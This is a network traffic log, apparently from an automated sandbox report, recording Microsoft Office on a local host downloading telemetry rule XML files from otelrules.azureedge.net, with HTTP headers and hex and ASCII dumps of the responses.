Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49838	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:37 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:38 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:38 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: d8ac3bcc-601e-0032-16b2-42eebb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114838Z-174f784596886s2bhC1EWR743w00000011h0000000000qq0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:38 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49839	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:37 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:38 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:38 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 83136512-401e-00ac-3a5a-400a97000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114838Z-174f7845968j6t2phC1EWRcfe800000011dg000000009y90 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:38 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49840	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:37 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:38 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:38 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 2b15fac9-d01e-002b-104f-4125fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114838Z-174f7845968j6t2phC1EWRcfe800000011h0000000006e1g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:38 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49842	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:39 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:40 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:40 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: c2b00c79-201e-0000-27b2-42a537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114840Z-174f7845968psccphC1EWRuz9s00000011k0000000008a9e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:40 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	49843	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:40 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:40 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:40 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 47663499-e01e-0051-6891-3f84b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114840Z-174f78459688l8rvhC1EWRtzr00000000dw00000000097t1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:40 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49844	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:40 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:40 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:40 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 52878fcf-c01e-00ad-731d-41a2b9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114840Z-174f7845968pght8hC1EWRyvxg00000004ng0000000006p9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:40 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49845	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:40 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:40 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:40 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 390894ac-101e-0017-4400-4247c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114840Z-174f7845968xlwnmhC1EWR0sv800000011a00000000016t8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:40 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49846	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:40 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:40 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:40 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114840Z-174f7845968cdxdrhC1EWRg0en00000011800000000091fz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:40 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49847	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:42 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:42 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 26f9b3b7-001e-008d-64ab-42d91e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114842Z-174f7845968frfdmhC1EWRxxbw00000011hg000000000bfd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:42 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49849	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:42 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:42 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: fdde8523-d01e-0028-578c-3f7896000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114842Z-174f7845968kdththC1EWRzvxn0000000dug0000000017ev x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:42 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49851	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:42 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:42 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: e9f7249a-b01e-00ab-72be-42dafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114842Z-174f7845968kdththC1EWRzvxn0000000dmg00000000arh8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:42 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49848	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:42 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:42 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: fd34d427-b01e-0001-7ca1-4246e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114842Z-174f7845968kvnqxhC1EWRmf3g0000000n8g000000001x79 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
